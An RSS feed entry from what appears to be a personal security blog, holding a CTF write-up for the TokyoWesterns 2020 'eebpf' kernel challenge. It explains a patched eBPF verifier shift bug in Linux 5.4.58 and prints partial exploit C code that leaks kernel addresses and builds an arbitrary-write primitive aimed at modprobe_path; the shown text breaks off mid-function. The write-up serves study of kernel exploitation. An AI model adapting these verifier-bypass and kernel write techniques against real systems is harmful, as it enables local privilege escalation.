<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>EBPF Verifier on Uniguri&#39;s Blog</title>
    <link>/tags/ebpf-verifier/</link>
    <description>Recent content in EBPF Verifier on Uniguri&#39;s Blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Tue, 28 Jan 2025 11:21:15 +0000</lastBuildDate><atom:link href="/tags/ebpf-verifier/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>TokyoWesternsCTF2020 eebpf</title>
      <link>/posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/</link>
      <pubDate>Tue, 28 Jan 2025 11:21:15 +0000</pubDate>
      
      <guid>/posts/kernel/write-ups/ctf/tokyowesternsctf2020-eebpf/</guid>
      <description>&lt;hr&gt;
&lt;h2 id=&#34;problem&#34;&gt;Problem&lt;/h2&gt;
&lt;h3 id=&#34;environment&#34;&gt;Environment&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;kernel version: &lt;code&gt;5.4.58&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;unprivileged_bpf_disabled: &lt;code&gt;0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;patch-file&#34;&gt;Patch file&lt;/h3&gt;
&lt;p&gt;The important part is following:&lt;/p&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;594782631&#34; type=&#34;checkbox&#34;  /&gt;
    &lt;label for=&#34;594782631&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-patch.diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-diff&#34; &gt;
      &lt;code&gt;diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
&amp;lt; #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
&amp;lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
&amp;lt; {
&amp;lt; 	if (insn_bitness == 32)
&amp;lt; 		//Never reach here now.
&amp;lt; 		return TNUM((u32)(((s32)a.value) &amp;lt;&amp;lt; min_shift),
&amp;lt; 			    (u32)(((s32)a.mask)  &amp;lt;&amp;lt; min_shift));
&amp;lt; 	else
&amp;lt; 		return TNUM((s64)a.value &amp;lt;&amp;lt; min_shift,
&amp;lt; 			    (s64)a.mask  &amp;lt;&amp;lt; min_shift);
&amp;lt; }
&amp;lt; 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
&amp;lt; 	case BPF_ALSH:
&amp;lt; 		if (umax_val &amp;gt;= insn_bitness) {
&amp;lt; 			/* Shifts greater than 31 or 63 are undefined.
&amp;lt; 			 * This includes shifts by a negative number.
&amp;lt; 			 */
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		/* Upon reaching here, src_known is true and
&amp;lt; 		 * umax_val is equal to umin_val.
&amp;lt; 		 */
&amp;lt; 		if (insn_bitness == 32) {
&amp;lt; 			//Now we don&amp;#39;t support 32bit. Cuz im too lazy.
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		} else {
&amp;lt; 			dst_reg-&amp;gt;smin_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 			dst_reg-&amp;gt;smax_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		dst_reg-&amp;gt;var_off = tnum_alshift(dst_reg-&amp;gt;var_off, umin_val,
&amp;lt; 						insn_bitness);
&amp;lt; 
&amp;lt; 		/* blow away the dst_reg umin_value/umax_value and rely on
&amp;lt; 		 * dst_reg var_off to refine the result.
&amp;lt; 		 */
&amp;lt; 		dst_reg-&amp;gt;umin_value = 0;
&amp;lt; 		dst_reg-&amp;gt;umax_value = U64_MAX;
&amp;lt; 		__update_reg_bounds(dst_reg);
&amp;lt; 		break;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And related location is following:&lt;/p&gt;</description>
      <content>&lt;hr&gt;
&lt;h2 id=&#34;problem&#34;&gt;Problem&lt;/h2&gt;
&lt;h3 id=&#34;environment&#34;&gt;Environment&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;kernel version: &lt;code&gt;5.4.58&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;unprivileged_bpf_disabled: &lt;code&gt;0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;patch-file&#34;&gt;Patch file&lt;/h3&gt;
&lt;p&gt;The important part is following:&lt;/p&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;594782631&#34; type=&#34;checkbox&#34;  /&gt;
    &lt;label for=&#34;594782631&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-patch.diff&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-diff&#34; &gt;
      &lt;code&gt;diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
&amp;lt; #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
&amp;lt; struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
&amp;lt; {
&amp;lt; 	if (insn_bitness == 32)
&amp;lt; 		//Never reach here now.
&amp;lt; 		return TNUM((u32)(((s32)a.value) &amp;lt;&amp;lt; min_shift),
&amp;lt; 			    (u32)(((s32)a.mask)  &amp;lt;&amp;lt; min_shift));
&amp;lt; 	else
&amp;lt; 		return TNUM((s64)a.value &amp;lt;&amp;lt; min_shift,
&amp;lt; 			    (s64)a.mask  &amp;lt;&amp;lt; min_shift);
&amp;lt; }
&amp;lt; 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
&amp;lt; 	case BPF_ALSH:
&amp;lt; 		if (umax_val &amp;gt;= insn_bitness) {
&amp;lt; 			/* Shifts greater than 31 or 63 are undefined.
&amp;lt; 			 * This includes shifts by a negative number.
&amp;lt; 			 */
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		/* Upon reaching here, src_known is true and
&amp;lt; 		 * umax_val is equal to umin_val.
&amp;lt; 		 */
&amp;lt; 		if (insn_bitness == 32) {
&amp;lt; 			//Now we don&amp;#39;t support 32bit. Cuz im too lazy.
&amp;lt; 			mark_reg_unknown(env, regs, insn-&amp;gt;dst_reg);
&amp;lt; 			break;
&amp;lt; 		} else {
&amp;lt; 			dst_reg-&amp;gt;smin_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 			dst_reg-&amp;gt;smax_value &amp;lt;&amp;lt;= umin_val;
&amp;lt; 		}
&amp;lt; 
&amp;lt; 		dst_reg-&amp;gt;var_off = tnum_alshift(dst_reg-&amp;gt;var_off, umin_val,
&amp;lt; 						insn_bitness);
&amp;lt; 
&amp;lt; 		/* blow away the dst_reg umin_value/umax_value and rely on
&amp;lt; 		 * dst_reg var_off to refine the result.
&amp;lt; 		 */
&amp;lt; 		dst_reg-&amp;gt;umin_value = 0;
&amp;lt; 		dst_reg-&amp;gt;umax_value = U64_MAX;
&amp;lt; 		__update_reg_bounds(dst_reg);
&amp;lt; 		break;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And related location is following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L42&#34;&gt;&lt;code&gt;tnum_alshift&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4866&#34;&gt;Add verification routine to &lt;code&gt;adjust_scalar_min_max_vals&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;vulnerability&#34;&gt;Vulnerability&lt;/h3&gt;
&lt;p&gt;As we can see, when we use &lt;code&gt;BPF_ALSH&lt;/code&gt;, &lt;code&gt;dst_reg-&amp;gt;smin_value &amp;lt;&amp;lt;= umin_val; dst_reg-&amp;gt;smax_value &amp;lt;&amp;lt;= umin_val;&lt;/code&gt; is executed.
And because type of &lt;code&gt;smin_value&lt;/code&gt; and &lt;code&gt;smax_value&lt;/code&gt; is &lt;code&gt;s64&lt;/code&gt;, we can make &lt;code&gt;smin_value &amp;gt; smax_value&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id=&#34;exploit&#34;&gt;Exploit&lt;/h2&gt;
&lt;h3 id=&#34;making-invalid-range&#34;&gt;Making invalid range&lt;/h3&gt;
&lt;p&gt;My step for making invalid range is following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Load element from bpf_map (we call it &lt;code&gt;e&lt;/code&gt;)
&lt;ol&gt;
&lt;li&gt;Its actual value is 1.&lt;/li&gt;
&lt;li&gt;Its tnum may be (.val=0, .mask=0xffffffffffffffff).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Do &lt;code&gt;e&lt;/code&gt; &amp;amp; 0x1fffffffffffffff.
&lt;ol&gt;
&lt;li&gt;Its actual value is 1.&lt;/li&gt;
&lt;li&gt;Its tnum may be (.val=0, .mask=0x1fffffffffffffff).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Do left shift to &lt;code&gt;e&lt;/code&gt; by 3.
&lt;ol&gt;
&lt;li&gt;Its actual value is 8.&lt;/li&gt;
&lt;li&gt;Its tnum may be (.val=0, .mask=0xfffffffffffffff8).&lt;/li&gt;
&lt;li&gt;Its min and max value is 0 and 0xfffffffffffffff8.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Add 8 to &lt;code&gt;e&lt;/code&gt;.
&lt;ol&gt;
&lt;li&gt;It actual value is 0x10.&lt;/li&gt;
&lt;li&gt;Its min and max value is 8 and 0.
&lt;ol&gt;
&lt;li&gt;Explained later.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Add (.val=0, .mask=8; min=0, max=8) to &lt;code&gt;e&lt;/code&gt;.
&lt;ol&gt;
&lt;li&gt;Now &lt;code&gt;e&lt;/code&gt; has (actual_value, verification_value) = (0x10, 8).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;Substract 8 from &lt;code&gt;e&lt;/code&gt;.
&lt;ol&gt;
&lt;li&gt;Now &lt;code&gt;e&lt;/code&gt; has (act_val, veri_val) = (8, 0).&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id=&#34;why-e8-does-make-min8-max0-&#34;&gt;Why &lt;code&gt;e&lt;/code&gt;+=8 does make min=8, max=0 ??&lt;/h4&gt;
&lt;p&gt;First, we check related functions (codes):&lt;/p&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;739216485&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;739216485&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-addition_code_path.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4600
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state *dst_reg,
                                      struct bpf_reg_state src_reg) {
    // ...

  case BPF_ADD:
    ret = sanitize_val_alu(env, insn);
    if (ret &amp;lt; 0) {
      verbose(env, &amp;#34;R%d tried to add from different pointers or scalars\n&amp;#34;,
              dst);
      return ret;
    }
    if (signed_add_overflows(dst_reg-&amp;gt;smin_value, smin_val) ||
        signed_add_overflows(dst_reg-&amp;gt;smax_value, smax_val)) {
      // ...
    } else {
      dst_reg-&amp;gt;smin_value += smin_val;
      dst_reg-&amp;gt;smax_value += smax_val;
    }
    if (dst_reg-&amp;gt;umin_value + umin_val &amp;lt; umin_val ||
        dst_reg-&amp;gt;umax_value + umax_val &amp;lt; umax_val) {
      dst_reg-&amp;gt;umin_value = 0;
      dst_reg-&amp;gt;umax_value = U64_MAX;
    } else {
      // ...
    }
    dst_reg-&amp;gt;var_off = tnum_add(dst_reg-&amp;gt;var_off, src_reg.var_off);
    break;

    // ...

    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/tnum.c#L62
struct tnum tnum_add(struct tnum a, struct tnum b) {
  u64 sm, sv, sigma, chi, mu;

  sm = a.mask + b.mask;
  sv = a.value + b.value;
  sigma = sm + sv;
  chi = sigma ^ sv;
  mu = chi | a.mask | b.mask;
  return TNUM(sv &amp;amp; ~mu, mu);
}

// @ https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L939
/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg_deduce_bounds(struct bpf_reg_state *reg) {
  /* Learn sign from signed bounds.
   * If we cannot cross the sign boundary, then signed and unsigned bounds
   * are the same, so combine.  This works even in the negative case, e.g.
   * -3 s&amp;lt;= x s&amp;lt;= -1 implies 0xf...fd u&amp;lt;= x u&amp;lt;= 0xf...ff.
   */
  if (reg-&amp;gt;smin_value &amp;gt;= 0 || reg-&amp;gt;smax_value &amp;lt; 0) {
    reg-&amp;gt;smin_value = reg-&amp;gt;umin_value =
        max_t(u64, reg-&amp;gt;smin_value, reg-&amp;gt;umin_value);
    reg-&amp;gt;smax_value = reg-&amp;gt;umax_value =
        min_t(u64, reg-&amp;gt;smax_value, reg-&amp;gt;umax_value);
    return;
  }

  // ...
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;When add 8 to &lt;code&gt;e&lt;/code&gt;, &lt;code&gt;e&lt;/code&gt; is (smin=umin=0, smax=umax=0xfffffffffffffff8; .val=0, .mask=0xfffffffffffffff8).
So and since &lt;code&gt;signed_add_overflows(dst_reg-&amp;gt;smin_value, smin_val) || signed_add_overflows(dst_reg-&amp;gt;smax_value, smax_val)&lt;/code&gt; is false and &lt;code&gt;dst_reg-&amp;gt;umin_value + umin_val &amp;lt; umin_val || dst_reg-&amp;gt;umax_value + umax_val &amp;lt; umax_val&lt;/code&gt; is true, &lt;code&gt;dst_reg-&amp;gt;smin_value += smin_val; dst_reg-&amp;gt;smax_value += smax_val;&lt;/code&gt; and &lt;code&gt;dst_reg-&amp;gt;umin_value = 0; dst_reg-&amp;gt;umax_value = U64_MAX;&lt;/code&gt; is executed.
Then, &lt;code&gt;e&lt;/code&gt; is (smin=8, smax=0, umin=0, umax=U64_MAX).&lt;/p&gt;
&lt;p&gt;And return value of &lt;code&gt;tnum_add&lt;/code&gt; is (.val=0, .mask=0xfffffffffffffff8).
So after &lt;code&gt;dst_reg-&amp;gt;var_off = tnum_add(dst_reg-&amp;gt;var_off, src_reg.var_off);&lt;/code&gt;, &lt;code&gt;e&lt;/code&gt; is (smin=8, smax=0, umin=0, umax=U64_MAX; .val=0, .mask=0xfffffffffffffff8).&lt;/p&gt;
&lt;p&gt;But in &lt;code&gt;__reg_deduce_bounds&lt;/code&gt;, &lt;code&gt;reg-&amp;gt;smin_value &amp;gt;= 0 || reg-&amp;gt;smax_value &amp;lt; 0&lt;/code&gt; is true, &lt;code&gt;reg-&amp;gt;smin_value = reg-&amp;gt;umin_value = max_t(u64, reg-&amp;gt;smin_value, reg-&amp;gt;umin_value);&lt;/code&gt; and &lt;code&gt;reg-&amp;gt;smax_value = reg-&amp;gt;umax_value = min_t(u64, reg-&amp;gt;smax_value, reg-&amp;gt;umax_value);&lt;/code&gt; is performed.
Because &lt;code&gt;reg-&amp;gt;smin_value == 8&lt;/code&gt;, &lt;code&gt;reg-&amp;gt;umin_value == 0&lt;/code&gt;, &lt;code&gt;reg-&amp;gt;smax_value == 0&lt;/code&gt; and &lt;code&gt;reg-&amp;gt;umax_value == U64_MAX&lt;/code&gt;, register&amp;rsquo;s min and max value is set by &lt;code&gt;reg-&amp;gt;?min_value = max_t(u64, 8, 0)&lt;/code&gt; and &lt;code&gt;reg-&amp;gt;?max_value = min_t(u64, 0, U64_MAX)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Because of this reasons, after &lt;code&gt;e&lt;/code&gt;+=8, &lt;code&gt;e&lt;/code&gt; will be (min=8, max=0).&lt;/p&gt;
&lt;h3 id=&#34;leak-struct-bpf_map-address&#34;&gt;Leak &lt;code&gt;struct bpf_map&lt;/code&gt; address&lt;/h3&gt;
&lt;p&gt;In &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt; function, if &lt;code&gt;off_reg-&amp;gt;smin_value &amp;gt; off_reg-&amp;gt;smax_value&lt;/code&gt;, the pointer is marked as unknown.
And the type of unknown register is scalar, we can leak its value.&lt;/p&gt;
&lt;p&gt;See followings:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379&#34;&gt;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L4379&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999&#34;&gt;https://elixir.bootlin.com/linux/v5.4.58/source/kernel/bpf/verifier.c#L999&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&#34;aaraaw-primitives&#34;&gt;AAR/AAW primitives&lt;/h3&gt;
&lt;p&gt;We can use the technique using &lt;code&gt;bpf_skb_load_bytes&lt;/code&gt; because of scalar which has invalid range.
Using this techinuqe, we can set the value on stack without verification by using invalid &lt;code&gt;len&lt;/code&gt; argument.
Originally &lt;code&gt;bpf_skb_load_bytes&lt;/code&gt; changes values from &lt;code&gt;to&lt;/code&gt; to &lt;code&gt;to+len&lt;/code&gt;. So, the values are marked as unknown.
But with invalid &lt;code&gt;len&lt;/code&gt;, we can set values with marked as known (invalid verification).&lt;/p&gt;
&lt;p&gt;So, we can use this.&lt;/p&gt;
&lt;h3 id=&#34;exploit-code&#34;&gt;Exploit code&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;276481593&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;276481593&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;TokyoWesternsCTF2020-eebpf-exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define BPF_ALSH 0xe0

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81a0dec0 - KERNEL_BASE)
#define MODPROBE_OFFSET (0xffffffff81c2e800 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
uint64_t map_addr;
static uint64_t leak_bpf_map_addr(int do_print_verifier_log) {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // map_lookup_elem(mapfd, &amp;amp;key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == 0 == (.val=0, .mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_0,
                    1),  // r0 = r0 &amp;amp; 1 == 0 == (.val=0, .mask=1)
      BPF_ALU64_IMM(
          BPF_ALSH, BPF_REG_0,
          63),  // r0 = r0 &amp;lt;&amp;lt; 63 == 0 == (.val=0, .mask=0x8000000000000000);
      // smin=0, smax=0x8000000000000000

      BPF_MOV64_REG(BPF_REG_1, BPF_REG_5),  // r1 = r5 == map_elem
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_0),  // r1 = r1 + r0; Because r0&amp;#39;s smin &amp;gt; s0&amp;#39;s smax,
                                 // r1 will be marked as unknown.
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_1),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x8, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x8),
      // arg3(&amp;amp;val)
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10),
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, BPF_ANY),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  // Trigger the BPF program
  write(socks[1], &amp;#34;UNIGURI&amp;#34;, 7);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  if (do_print_verifier_log) {
    puts(&amp;#34;============[verifier log]============&amp;#34;);
    printf(&amp;#34;%s&amp;#34;, verifier_log);
    puts(&amp;#34;============[verifier log]============&amp;#34;);
  }

  return val - 0xd0;
}

static void aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x8),

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // map_lookup_elem(mapfd, &amp;amp;key)
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),
      BPF_MOV64_REG(BPF_REG_5, BPF_REG_0),           // r5 = map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0),  // r6 = *map_elem == 1

      BPF_MOV64_REG(
          BPF_REG_0,
          BPF_REG_6),  // r0 = r6 == (.val=0, .mask=0xffffffffffffffff)
      BPF_MOV64_IMM(BPF_REG_1, -1),  // r1 = 0xffffffffffffffff
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    3),  // r1 = r1 &amp;gt;&amp;gt; 3 == 0x1fffffffffffffff
      BPF_ALU64_REG(BPF_AND, BPF_REG_0,
                    BPF_REG_1),  // r0 = r0 &amp;amp; r1 == (actual_val=1; .val=0,
                                 // .mask=0x1fffffffffffffff)
      BPF_ALU64_IMM(BPF_ALSH, BPF_REG_0,
                    3),  // r0 = r0 &amp;lt;&amp;lt; 3 == (actual_val=8; .val=0,
                         // .mask=0xfffffffffffffff8;
                         // umin=0, umax=0xfffffffffffffff8)
      BPF_ALU64_IMM(
          BPF_REG_0, BPF_ADD,
          8),  // r0 = r0 + 8 == (actual_val=0x10; .val=0, .mask=0x8; umin=0x8,
               // umax=0). Because of integer overflow in umax.
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),  // r1 = r6 == [map_elem]
      BPF_ALU64_IMM(
          BPF_AND, BPF_REG_1,
